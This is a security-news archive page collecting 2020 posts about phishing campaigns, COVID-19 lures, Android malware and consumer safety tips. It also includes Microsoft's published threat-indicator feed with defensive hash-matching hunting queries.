Category Archives: Phishing

Trump, Biden Campaign Staffers Targeted By APT Phishing Emails

Google TAG researchers warn that APTs are targeting campaign staffers for both Donald Trump and Joe Biden with phishing emails.

We Are All in This Together: Responding to the COVID-19 Pandemic

 

Global representatives of the PCI Security Standards Council recently came together, via a virtual video platform, to discuss how the Council is responding to the COVID-19 pandemic, as well as best practices for the payment industry during this unprecedented time.

Phishers Use Fake VPN Config Notification to Target Office 365 Details

Security researchers observed phishers leveraging a fake VPN configuration notification to target employees’ Office 365 credentials. Abnormal Security found that the campaign attempted to capitalize on the trend of organizations implementing VPNs for the purpose of securing their remote employees during COVID-19. As quoted by the security platform: The attack impersonates a notification email from […]… Read More

The post Phishers Use Fake VPN Config Notification to Target Office 365 Details appeared first on The State of Security.

Office 365 users: Beware of fake company emails delivering a new VPN configuration

Phishers are impersonating companies’ IT support team and sending fake VPN configuration change notifications in the hopes that remote employees may be tricked into providing their Office 365 login credentials. Yet another Office 365 phishing campaign “The sender email address is spoofed to impersonate the domain of the targets’ respective organizations. The link provided in the email allegedly directs to a new VPN configuration for home access. Though the link appears to be related to … More

The post Office 365 users: Beware of fake company emails delivering a new VPN configuration appeared first on Help Net Security.

Smashing Security podcast #181: Anti-cybercrime ads, tricky tracing, and a 5G Bioshield

Police are hoping to stop kids becoming cybercriminals by bombarding them with Google Ads, phishers rub their hands in glee at the NHS track and trace service, and just how does a nano-layer of quantum holographic catalyzer technology make a USB stick cost hundreds of pounds?

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast.

Umbrella with SecureX built-in: Coordinated Protection

This blog was written by David Gormley, Cloud Security Product Marketing Manager at Cisco.

Cybercriminals have been refining their strategies and tactics for over twenty years and attacks have been getting more sophisticated. A successful cyberattack often involves a multi-step, coordinated effort. Research on successful breaches shows that hackers are very thorough with the information they collect and the comprehensive plans they execute to understand the environment, gain access, infect, move laterally, escalate privileges and steal data.

An attack typically includes at least some of the following steps:

  • reconnaissance activities to find attractive targets
  • scanning for weaknesses that present a good entry point
  • stealing credentials
  • gaining access and privileges within the environment
  • accessing and exfiltrating data
  • hiding past actions and ongoing presence

This whole process is sometime called the “attack lifecycle” or “kill chain” and a successful attack requires a coordinated effort throughout the process. The steps above involve many different elements across the IT infrastructure including email, networks, authentication, endpoints, SaaS instances, multiple databases and applications. The attacker has the ability to plan in advance and use multiple tactics along the way to get to the next step.

Security teams have been busy over the past couple of decades as well.  They have been building a robust security practice consisting of tools and processes to track activities, provide alerts and help with the investigation of incidents.  This environment was built over time and new tools were added as different attack methods were developed. However, at the same time, the number of users, applications, infrastructure types, and devices has increased in quantity and diversity.  Networks have become decentralized as more applications and data have moved to the cloud. In most instances, the security environment now includes over 25 separate tools spanning on-prem and cloud deployments. Under these conditions, it’s difficult to coordinate all of the activities necessary to block threats and quickly identify and stop active attacks.

As a consequence, organizations are struggling to get the visibility they need across their IT environment and to maintain their expected level of effectiveness. They are spending too much time integrating separate products and trying to share data and not enough time quickly responding to business, infrastructure, and attacker changes.  The time has come for a more coordinated security approach that reduces the number of separate security tools and simplifies the process of protecting a modern IT environment.

Cisco Umbrella with SecureX can make your security processes more efficient by blocking more threats early in the attack process and simplifying the investigation and remediation steps. Umbrella handles over 200 billion internet requests per day and uses fine-tuned models to detect and block millions of threats. This “first-layer” of defense is critical because it minimizes the volume of malicious activity that makes its way deeper into your environment.  By doing this, Umbrella reduces the stress on your downstream security tools and your scarce security talent.  Umbrella includes DNS Security, a secure web gateway, cloud-delivered firewall, and cloud access security broker (CASB) functionality. But no one solution is going to stop all threats or provide the quickly adapting environment described above. You need to aggregate data from multiple security resources to get a coordinated view of what’s going on in your environment but can’t sink all your operating expenses into simply establishing and maintaining the integrations themselves.

That’s where Cisco SecureX comes in. Cisco SecureX connects the breadth of Cisco’s integrated security portfolio – including Umbrella– and your other security tools for a consistent experience that unifies visibility, enables automation, and strengthens your security across network, endpoints, cloud, and applications. Let’s explore some of the capabilities of SecureX, the Cisco security platform and discuss what they mean in the context of strengthening breach defense.

  • Visibility: Our SecureX platform provides visibility with one consolidated view of your entire security environment. The SecureX dashboard can be customized to view operational metrics alongside your threat activity feed and the latest threat intelligence. This allows you to save time that was otherwise spent switching consoles. With the Secure threat response feature, you can accelerate threat investigation and take corrective action in under two clicks.
  • Automation: You can increase the efficiency and precision of your existing security workflows via automation to advance your security maturity and stay ahead of an ever-changing threat landscape. SecureX pre-built, customizable playbooks enable you to automate workflows for phishing and threat hunting use cases. SecureX automation allows you to build your own workflows including collaboration and approval workflow elements to more effectively operate as a team.   It enables your teams to share context between SecOps, ITOps, and NetOps to harmonize security policies and drive stronger outcomes.
  • Integration: With SecureX, you can advance your security maturity by connecting your existing security infrastructure via out-of-the-box interoperability with third party solutions. In addition to the solution-level integrations we’ve already made available; new, broad, platform-level integrations have also been and continue to be developed. In short, you’re getting more functionality out of the box so that you can multiply your use cases and realize stronger outcomes.

Pre-built playbooks focus on common security use cases, and you can easily build your own using an intuitive, drag-and-drop interface. One example of the coordination between Umbrella and SecureX is in the area of phishing protection and investigation. Umbrella provides protection against a wide range of phishing attacks by blocking connections to known bad domains and URLs. SecureX extends this protection with a phishing investigation workflow that allows your users to forward suspicious email messages from their inbox. In addition, a dedicated inspection mailbox starts an automated investigation and enrichment process. This includes data from multiple solutions including Umbrella, email security, endpoint protection, threat response and malware analysis tools. Suspicious email messages are scraped for various artifacts and inspected in the Threat Grid sandbox. If malicious artifacts are identified, a coordinated response action, including approvals, is carried out automatically, in alignment with your regular operations process.

The SecureX platform is included with Cisco security solutions to advance the value of your investment. It connects Cisco’s integrated security portfolio, your other security tools and existing security infrastructure with out-of-the-box interoperability for a consistent experience that unifies visibility, enables automation, and strengthens your security across network, endpoints, cloud, and applications.

Sign up to the SecureX waitlist so you can be first to receive sign-on instructions when it becomes generally available later in June at Cisco.com/go/SecureX 

The post Umbrella with SecureX built-in: Coordinated Protection appeared first on Cisco Blogs.

StrandHogg 2.0: Critical Android flaw allows app hijacking, data theft

Google has released a patch for CVE-2020-0096, a critical escalation of privilege vulnerability in Android that allows attackers to hijack apps (tasks) on the victim’s device and steal data. Dubbed StrandHogg 2.0 because its similar to the StrandHogg vulnerability exploited by hackers in late 2019, it affects all but the latest version of Android. The good news is, though, that there is no indication it is being actively used by attackers. About StrandHogg 2.0 (CVE-2020-0096) … More

The post StrandHogg 2.0: Critical Android flaw allows app hijacking, data theft appeared first on Help Net Security.

Beware of phishing emails urging for a LogMeIn security update

LogMeIn users are being targeted with fake security update requests, which lead to a spoofed phishing page. “Should recipients fall victim to this attack, their login credentials to their LogMeIn account would be compromised. Additionally, since LogMeIn has SSO with Lastpass as LogMeIn is the parent company, it is possible the attacker may be attempting to obtain access to this user’s password manager,” Abnormal Security noted. The fake LogMeIn security update request The phishing email … More

The post Beware of phishing emails urging for a LogMeIn security update appeared first on Help Net Security.

Protect Yourself Against Phishing Scams With These Security Tips

Phishing is one of the oldest cyberthreats in the book, and yet still one of the most effective. As people across the globe find themselves taking to the internet more than ever before, criminals see this as an opportunity to release phishing attacks on unsuspecting users. In fact, Security Boulevard found a 600% rise in phishing campaigns in the last month. So, as users leverage the World Wide Web to stay connected with friends and loved ones, it’s imperative that they remain wary of scammers looking to exploit our need to virtually communicate. With that, let’s take a look at why phishing is so effective even in 2020 and explore what actions users can take to stay protected. 

What is Phishing?

Phishing attacks occur when scammers attempt to trick users out of money or personal information, usually by email, phone, or text. With so many avenues for criminals to hook victims, phishing is one of the most prevalent threats we see today. As part of their phishing schemes, scammers often use something called social engineering to manipulate users into trusting them for fraudulent purposes, often by pretending to be a legitimate person or business. Through these phishing attacks, criminals can spread malware and other malicious content.  

The Evolution of Phishing

As new technology and circumstances arise, scammers find new ways to evolve the age-old technique of phishing. What originated as email and instant messages attempting to steal users’ credentials has since taken on new forms like SMiShing or adapted its content to hook the victim with a shocking subject line. 

Why has this technique continued to plague users since its inception? Hackernoon argues that it’s because phishing doesn’t require in-depth networking knowledge or even basic programming skills. It simply relies on human error and the lack of online security awareness, manipulating human psychology just as much as technological tools.  

Phishing Capitalizes on Emotion

Let’s face it – we’re all human. Our inherent psychology makes us quick to act on emotion. However, this is much of the reason why phishing has forged on as a favorite among hackers. Unfortunately, criminals tend to capitalize on bad or shocking news to grasp the victim’s attention, leading them to click on malicious links or give up personal data all too eagerly. Take today’s environment, for example. As businesses are faced with budget cuts and organizational restructuring, many users might be uncertain about their job security – an opportunity that scammers are eager to exploit. In fact, some organizations have recently observed phishing emails with subject lines reading “HR Termination List.” Through these malicious attempts, fraudsters use fear tactics to tempt recipients into clicking on links in emails or downloading dangerous content.  

With millions of users suddenly out of work, a lot of people have found themselves desperately looking for new job opportunities or seeking financial help. However, users should not let their guard down while job hunting, as this could prevent them from noticing the tell-tale signs of phishing. According to The Motley Fool, some phishing emails and text messages claim to offer work-from-home job opportunities, information about health insurance or Medicare, or loans or other forms of financial reliefIn fact, the Federal Communications Commission (FCC) reported that many Americans have received texts from the “FCC Financial Care Center” offering $30,000 in relief for those who have recently been laid off or furloughed. While this might appear to be a saving grace, it’s a stealthy demise to trick users into giving up their credentials.  

Act Now to Stay Protected

So, whether you’re working from homeparticipating in distance learning to complete college courses, or video chatting with loved ones, there will always be fraudsters looking to exploit your online activity. However, there are proactive measures you can take to help ensure your security. First and foremost is using comprehensive security softwareIf you’ve never been targeted by a phishing scam, it might be difficult to envision the benefit of installing a security solution. You might even be convinced that if you haven’t been targeted yet, then you won’t be in the future. However, there’s no off-season when it comes to security. As fraudsters continue to evolve their techniques, employing the help of security software will act as an added safety net in the event that a phishing email appears in your inbox.  

Aside from using comprehensive security software, here are some other tips to help protect your online security.  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or with information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links. 

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Protect Yourself Against Phishing Scams With These Security Tips appeared first on McAfee Blogs.

Money is still the root of most breaches

Verizon has released its annual Data Breach Investigations Report (DBIR), which offers an overview of the cyber security incidents and data breaches that happened in/were discovered in the past year. Based on an analysis of incident and breach reports by 81 contributing organizations – companies, CERTs, law enforcement agencies and cybercrime units, etc. – from around the world, the DBIR offers insight into current cyber attack trends and the threats organizations in various industry verticals … More

The post Money is still the root of most breaches appeared first on Help Net Security.

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they used to be three months ago. Many users have made the transition from working in an office to working from home and students have adopted distance learningBut while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.  

As users adapt to their increased time spent at home and onlinehackers are taking advantage by spreading malware and other scams. Let’s break down some of the major malware scams affecting users today, as well as how they can stay secure.   

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP). RDP is a Microsoft protocol that allows communication with a remote system. At a time where connectivity is more important now than ever before, it’s critical for users to be able to easily access the same tools and apps that they would in their office from their newfound remote work environmentsHowever, it’s likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet,  an attacker could gain access to an entire network and consequentially, access a remote employee’s systemWhat’s more, these networks can be used as entry points for spreading malware or other malicious activities.  

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotelyBecause exposed RDP ports grant criminals access to remote systems, they are able to implement a number of malicious threats that could not only impact users working from home but also the organizations they work for. These threats include spreading spam and malware, as well as using the compromised RDP port to disguise malicious activity and compile their tools on the machine.  

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails regarding today’s current events to lure people into engaging with malicious content and enabling threats to gain access to their systemsOnce established, that foothold can allow hackers to leverage malware to steal usernames and passwords, data, monitor user activity, capture user keystrokes, track network traffic and browser activity, and infiltrate networks and cloud services beyond the home. Criminals can also impersonate their victim to send emails from the infected devices to propagate themselves on numerous other systems. What’s more, hackers could spread ransomware that encrypts system files and refuse to decrypt them until the victim sends a ransom payment.  

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors to breach into organizations and personal networksit’s important to follow best security practices. This includes using strong passwords and multi-factor authentication, patching vulnerabilities immediately, and not allowing RDP connections over the open internet. Discover more best practices on how to secure your RDP protocol in our blog on RDP security 

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post How to Stay Protected From Malware While Online at Home appeared first on McAfee Blogs.

Criminals boost their schemes with COVID-19 themed phishing templates

Phishers are incessantly pumping out COVID-19 themed phishing campaigns and refining the malicious pages the targets are directed to. “Credential phishing attackers often tailor their email lures with themes they believe will be the most effective and use general websites for actual credential harvesting. The recent move to create custom COVID-19 payment phishing templates indicates that buyers view them as effective enough to warrant custom tactics to harvest credentials,” Proofpoint researchers have noted. The COVID-19 … More

The post Criminals boost their schemes with COVID-19 themed phishing templates appeared first on Help Net Security.

Open-sourcing new COVID-19 threat intelligence

A global threat requires a global response. While the world faces the common threat of COVID-19, defenders are working overtime to protect users all over the globe from cybercriminals using COVID-19 as a lure to mount attacks. As a security intelligence community, we are stronger when we share information that offers a more complete view of attackers’ shifting techniques. This more complete view enables us all to be more proactive in protecting, detecting, and defending against attacks.

At Microsoft, our security products provide built-in protections against these and other threats, and we’ve published detailed guidance to help organizations combat current threats (Responding to COVID-19 together). Our threat experts are sharing examples of malicious lures and we have enabled guided hunting of COVID-themed threats using Azure Sentinel Notebooks. Microsoft processes trillions of signals each day across identities, endpoint, cloud, applications, and email, which provides visibility into a broad range of COVID-19-themed attacks, allowing us to detect, protect, and respond to them across our entire security stack. Today, we take our COVID-19 threat intelligence sharing a step further by making some of our own indicators available publicly for those that are not already protected by our solutions. Microsoft Threat Protection (MTP) customers are already protected against the threats identified by these indicators across endpoints with Microsoft Defender Advanced Threat Protection (ATP) and email with Office 365 ATP.

In addition, we are publishing these indicators for those not protected by Microsoft Threat Protection to raise awareness of attackers’ shift in techniques, how to spot them, and how to enable your own custom hunting. These indicators are now available in two ways. They are available in the Azure Sentinel GitHub and through the Microsoft Graph Security API. For enterprise customers who use MISP for storing and sharing threat intelligence, these indicators can easily be consumed via a MISP feed.

This threat intelligence is provided for use by the wider security community, as well as customers who would like to perform additional hunting, as we all defend against malicious actors seeking to exploit the COVID crisis.

This COVID-specific threat intelligence feed represents a start at sharing some of Microsoft’s COVID-related IOCs. We will continue to explore ways to improve the data over the duration of the crisis. While some threats and actors are still best defended more discreetly, we are committed to greater transparency and taking community feedback on what types of information is most useful to defenders in protecting against COVID-related threats. This is a time-limited feed. We are maintaining this feed through the peak of the outbreak to help organizations focus on recovery.

Protection in Azure Sentinel and Microsoft Threat Protection

Today’s release includes file hash indicators related to email-based attachments identified as malicious and attempting to trick users with COVID-19 or Coronavirus-themed lures. The guidance below provides instructions on how to access and integrate this feed in your own environment.

For Azure Sentinel customers, these indicators can be either be imported directly into Azure Sentinel using a Playbook or accessed directly from queries.

The Azure Sentinel Playbook that Microsoft has authored will continuously monitor and import these indicators directly into your Azure Sentinel ThreatIntelligenceIndicator table. This Playbook will match with your event data and generate security incidents when the built-in threat intelligence analytic templates detect activity associated to these indicators.

These indicators can also be accessed directly from Azure Sentinel queries as follows:

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"));
covidIndicators

Azure Sentinel logs.

A sample detection query is also provided in the Azure Sentinel GitHub. With the table definition above, it is as simple as:

  1. Join the indicators against the logs ingested into Azure Sentinel as follows:
covidIndicators
| join ( CommonSecurityLog | where TimeGenerated >= ago(7d)
| where isnotempty(FileHashValue)
) on $left.FileHashValue == $right.FileHash
  1. Then, select “New alert rule” to configure Azure Sentinel to raise incidents based on this query returning results.

CyberSecurityDemo in Azure Sentinel logs.

You should begin to see Alerts in Azure Sentinel for any detections related to these COVID threat indicators.

Microsoft Threat Protection provides protection for the threats associated with these indicators. Attacks with these Covid-19-themed indicators are blocked by Office 365 ATP and Microsoft Defender ATP.

While MTP customers are already protected, they can also make use of these indicators for additional hunting scenarios using the MTP Advanced Hunting capabilities.

Here is a hunting query to see if any process created a file matching a hash on the list.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )
[@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"]
with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (DeviceFileEvents
| where Timestamp > ago(1d)
| where ActionType == 'FileCreated'
| take 100) on $left.FileHashValue  == $right.SHA256

Advanced hunting in Microsoft Defender Security Center.

This is an Advanced Hunting query in MTP that searches for any recipient of an attachment on the indicator list and sees if any recent anomalous log-ons happened on their machine. While COVID threats are blocked by MTP, users targeted by these threats may be at risk for non-COVID related attacks and MTP is able to join data across device and email to investigate them.

let covidIndicators = (externaldata(TimeGenerated:datetime, FileHashValue:string, FileHashType: string )    [@"https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/Microsoft.Covid19.Indicators.csv"] with (format="csv"))
| where FileHashType == 'sha256' and TimeGenerated > ago(1d);
covidIndicators
| join (  EmailAttachmentInfo  | where Timestamp > ago(1d)
| project NetworkMessageId , SHA256
) on $left.FileHashValue  == $right.SHA256
| join (
EmailEvents
| where Timestamp > ago (1d)
) on NetworkMessageId
| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0])
| join (
DeviceLogonEvents
| project LogonTime = Timestamp, AccountName, DeviceName
) on AccountName
| where (LogonTime - TimeEmail) between (0min.. 90min)
| take 10

Advanced hunting in Microsoft 365 security.

Connecting an MISP instance to Azure Sentinel

The indicators published on the Azure Sentinel GitHub page can be consumed directly via MISP’s feed functionality. We have published details on doing this at this URL: https://aka.ms/msft-covid19-misp. Please refer to the Azure Sentinel documentation on connecting data from threat intelligence providers.

Using the indicators if you are not an Azure Sentinel or MTP customer

Yes, the Azure Sentinel GitHub is public: https://aka.ms/msft-covid19-Indicators

Examples of phishing campaigns in this threat intelligence

The following is a small sample set of the types of COVID-themed phishing lures using email attachments that will be represented in this feed. Beneath each screenshot are the relevant hashes and metadata.

Figure 1: Spoofing WHO branding with “cure” and “vaccine” messaging with a malicious .gz file.

Name: CURE FOR CORONAVIRUS_pdf.gz

World Health Organization phishing email.

Figure 2: Spoofing Red Cross Safety Tips with malicious .docm file.

Name: COVID-19 SAFETY TIPS.docm

Red Cross phishing email.

Figure 3: South African banking lure promoting COVID-19 financial relief with malicious .html files.

Name: SBSA-COVID-19-Financial Relief.html

Financial relief phishing email.

Figure 4: French language spoofed correspondence from the WHO with malicious XLS Macro file.

Name: -✉-Covid-19 Relief Plan5558-23636sd.htm

Coronavirus-themed phishing email.

If you have questions or feedback on this COVID-19 feed, please email msft-covid19-ti@microsoft.com.

The post Open-sourcing new COVID-19 threat intelligence appeared first on Microsoft Security.

Crooks continues to use COVID-19 lures, Microsoft warns

Microsoft discovered a new phishing campaign using COVID-19 lures to target businesses with the infamous LokiBot information-stealer.

Microsoft has discovered a new COVID-19 themed phishing campaign targeting businesses with the LokiBot Trojan.

Lokibot was already employed in Coronavirus-themed campaigns, early of April, security experts at FortiGuard Labs discovered phishing attacks using alleged messages from the World Health Organization (WHO) to deliver the LokiBot trojan.

COVID-19 themed phishing campaigns recently observed by Microsoft was using messages with subject lines like “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020.”

The LokiBot data stealer is able to collect information from tens of different web browsers, access to browsing data, locate the credentials for more than 15 different email and file transfer clients, and check for the presence of popular remote admin tools like SSH, VNC and RDP.

One of the phishing campaigns observed by Microsoft sees attackers pretending to be from the Centers for Disease Control (CDC), the messages promise latest information on the COVID-19 pandemic and a new “BUSINESS CONTINUITY PLAN ANNOUNCEMENT STARTING MAY 2020”.

Another campaign use messages that pretend to be from a vendor asking for updated banking information to process payments due to the COVID-19 virus lockdown.

The emails in both campaigns use ARJ attachments that contain malicious executables disguised as PDF files.

The choice of password-protected ARJ files aims at bypassing some security solutions. Upon opening the enclosed files, the infection process will start to finally deliver the LokiBot Trojan.

Microsoft pointed out that its Microsoft Threat Protection’s machine learning algorithms were able to detect the campaign, Microsoft users are automatically protected by the Microsoft Defender.

“Microsoft Defender’s advanced detection technologies, including behavior learning and machine learning, started blocking this attack right away. We used deeper analysis of the blocked attacks, which helped us to identify the end-to-end campaign detailed,” Tanmay Ganacharya, director of security research of Microsoft Threat Protection, told BleepingComputer.

“We see a lot of benefits of leveraging machine learning and we are in a very unique position here at Microsoft because of the quality and diversity of our 8.2 trillion signals we process daily through the Microsoft Intelligent Security Graph.” 

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Crooks continues to use COVID-19 lures, Microsoft warns appeared first on Security Affairs.

Online Scam Awareness: Staying Safer in Uncertain Times

Online Scams

Online Scam Awareness: Staying Safer in Uncertain Times

As we adjust to a changed world, bad actors are also changing the tactics they use to take advantage of people. You may have already encountered schemes that leverage fear and anxiety to make you click, buy, or respond to malicious communications. Fortunately, a little awareness is all it takes to recognize the scams below and protect yourself and your family.

Phishing Emails

Our new normal means that many face-to-face transactions have moved to email.  We are now relying on email for daily communications from schools, updates from our local businesses and so much more. Armed with this knowledge, online scammers are creating emails capitalizing on sensitive and relevant topics to lure you to hand over personal information.

Stimulus Check

A very topical scam today takes the form of a phony message from the government, or the IRS, asking you to submit personal information or file a tax form to receive a government stimulus check which can lead to identity theft. The government does not send email communications.

Health Alerts

Another popular scam plays on a sensitive topic today, our health. Examples of this include emails masked as coming from a reputable health organization, such as the CDC, asking you to “click on a link to see health news in your area”. The link could download dangerous malware to your device.

Working From Home

While many of us are working from home now, we are seeing fraudsters take advantage of this through efforts like the “CEO Scam” where they spoof the email address of someone in your workplace with a position of power.  Emails from this spoofed account typically include work-from-home policies or safety precautions and ask you to download an attached policy sheet, which may contain malware.

Delivery Notices

We are all relying on home deliveries more than ever now.  Recent scams send a warning that your order or account is on “hold” until you verify some details, or that you need to click on an attachment to see the delivery time. Often they will spoof popular e-commerce sites, like FedEx or Amazon and deliver malware straight to your inbox.

Social media scams 

Be wary of social media platforms. Scammers are using these outlets to advertise phony cures, medical equipment in bulk, and other schemes not unlike the ones used in the phishing emails above.

Fake E-Commerce sites

Hundreds of new e-commerce sites have been popping up offering everything from hard-to-find products, medical equipment, and more Some are legitimate middlemen hoping to turn a quick profit, but others are fake websites looking to collect your personal and financial information.

Protect yourself with these 5 tips

  • Learn to spot suspicious emails: Check the email address by hovering over it with your mouse. Does the extension on the address match the company the email represents? Other red flags to look for are typos, grammatical errors and the use of generic greetings such as “Dear Sir”.
  • If you get what appears to be a suspicious request from someone at work, a friend, or family member, verify the message with that person directly before opening or responding.
  • If you are looking for health or financial information online, stick to reputable sources such as state and government websites and the CDC. Never respond to unsolicited emails or click on included links.
  • When shopping or browsing online, go directly to reputable websites, instead of clicking on questionable ads, links or emails.
  • Ensure that you continue to update your security solutions across all devices. This will help protect devices against malware, phishing attacks, and other threats, as well as help identify malicious websites when browsing.

 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Online Scam Awareness: Staying Safer in Uncertain Times appeared first on McAfee Blogs.

Poor Password Practices: The Curse of the Cybersecurity Risk Index Score

Reading Time: ~ 3 min.

Your password passing habit may not be as be as harmless as you think. And yes, that includes Netflix login info too.

That’s one finding to come out of our newly released study of 2020’s Most (and Least) Cyber-Secure States. In this year’s analysis of the cyber readiness of all 50 U.S. states, and in partnership with Wakefield Research, we created a “Cyber Risk Hygiene Index” based on 10 metrics meant to measure individual and state-level cyber resilience against adverse online events.

If you’re unfamiliar with the report, you can read an introduction here.

Unfortunately for many Americans, two of those cyber hygiene metrics involved questions about their password habits:

  • Do you avoid sharing passwords with others?
  • Do you avoid reusing passwords?

Now, these questions weren’t the only reason no American received a passing grade on our Cyber Risk Hygiene Index, or that no state scored higher than a D, but they didn’t help. In all, the report found that more than one-third (34%) of Americans admit to sharing passwords and login credentials with others. Nearly half (49%) report having more accounts than passwords, meaning passwords are being reused across accounts.

Perhaps even more troubling is the finding that sharing passwords for streaming services—that famously widespread and supposedly benign new-age habit—has a worrying correlation: Americans who share passwords for streaming services (38%) are twice as likely to say they have had their identity stolen than those who do not (18%).

This is alarming because sharing and reusing passwords is especially dangerous during this golden age of phishing attacks. It means that, as soon as a cybercriminal achieves success in one phishing attack, those pinched credentials are likely to work for several other popular sites. A single successful phishing expedition could yield catches on banking sites, credit card applications, online marketplaces, and in a host of other potentially lucrative instances.

Even by sharing passwords with those a smidge less than trustworthy—or just careless—you’re increasing your attack surface area. Now that network of individuals who now have access to your accounts are susceptible to giving your information away if they take the bait in a phishing attack.

“Instead of giving away the keys to the guest room when you share passwords, it’s more like giving away keys to the castle if they are reused across multiple accounts,” says Webroot threat analyst Tyler Moffitt, “you could begiving away the keys to the whole kingdom if that’s the only password you use.”

More password facts from the report

  • Tech Experts, one of the riskiest categories of users studied in our report, are more likely to share passwords (66%) than the average American (44%). Clearly, we at Webroot are in no position to point fingers.
  • On brand, 66 percent of so-called “Mile Markers” refrained from sharing passwords, compared to 63 percent for the average American. This group scored the highest on our index and is defined by having progressed through life markers such as earning a degree, owning a home, or having children.
  • Home-based Very Small Businesses (VSBs) are less likely to work with a dedicated IT team. As a result, they are more likely to use their personal devices for work and share passwords. Of these, 71 percent use the same passwords for home and business accounts, potentially cross contaminating their work and personal lives with the same security gaps.
  • By generation, Gen Z is most likely to share passwords (56%), followed by Millennials (47%), Gen X (33%), and Boomers (19%).

How to address poor password practices

In terms of a personal password policy, it’s important to set yourself up for success. Yes, it’s true the amount of passwords one is responsible for can be dizzying, 191 per business according to one popular study.

That, and the parameters for creating a sound password seemingly grow more complex by the day. It used to be enough just to have a password. But now, they must be x characters long, contain one number and one special characters and so-on… And did we mention we recommend it be a passphrase, not a traditional password?

You get the gist.

That’s why our single strongest piece of advice to users looking to upgrade their cyber resilience is to use a password manager. This allows you to create long, alphanumeric and otherwise meaningless passwords without the need to keep tabs on them all.

After you’ve created a strong bank of passwords, managed through a password management service, supplement your security by adding two-factor authentication (2FA). Measures like 2FA pair your login credentials—something you know—with something you have, like a biometric feature or a mobile phone. This will ensure lifting your password (a unique one for each account, no doubt) isn’t even enough to crack your account.

“Put simply, an account simply isn’t as secure as it could be without 2FA,” says Moffitt. “And that means your credit card info, home address, or bank accounts aren’t as safe as they could be.”

No more reusing passwords. And, hopefully, no more sharing passwords. But that part’s up to you. You just have to ask yourself, is Netflix access worth having your identity stolen?

The post Poor Password Practices: The Curse of the Cybersecurity Risk Index Score appeared first on Webroot Blog.

Digital Fraudsters Masquerading as FINRA in Phishing Emails

The Financial Industry Regulatory Authority (FINRA) warned that digital fraudsters are impersonating it in an ongoing phishing email campaign. In a regulatory notice published on its website, FINRA revealed that malicious actors had sent out fraudulent emails in which they had impersonated officers at the regulatory authority including Bill Wollman and Josh Drobnyk. All of […]… Read More

The post Digital Fraudsters Masquerading as FINRA in Phishing Emails appeared first on The State of Security.

Malware in Google Apps

Interesting story of malware hidden in Google Apps. This particular campaign is tied to the government of Vietnam.

At a remote virtual version of its annual Security Analyst Summit, researchers from the Russian security firm Kaspersky today plan to present research about a hacking campaign they call PhantomLance, in which spies hid malware in the Play Store to target users in Vietnam, Bangladesh, Indonesia, and India. Unlike most of the shady apps found in Play Store malware, Kaspersky's researchers say, PhantomLance's hackers apparently smuggled in data-stealing apps with the aim of infecting only some hundreds of users; the spy campaign likely sent links to the malicious apps to those targets via phishing emails. "In this case, the attackers used Google Play as a trusted source," says Kaspersky researcher Alexey Firsh. "You can deliver a link to this app, and the victim will trust it because it's Google Play."

[...]

The first hints of PhantomLance's campaign focusing on Google Play came to light in July of last year. That's when Russian security firm Dr. Web found a sample of spyware in Google's app store that impersonated a downloader of graphic design software but in fact had the capability to steal contacts, call logs, and text messages from Android phones. Kaspersky's researchers found a similar spyware app, impersonating a browser cache-cleaning tool called Browser Turbo, still active in Google Play in November of that year. (Google removed both malicious apps from Google Play after they were reported.) While the espionage capabilities of those apps was fairly basic, Firsh says that they both could have expanded. "What's important is the ability to download new malicious payloads," he says. "It could extend its features significantly."

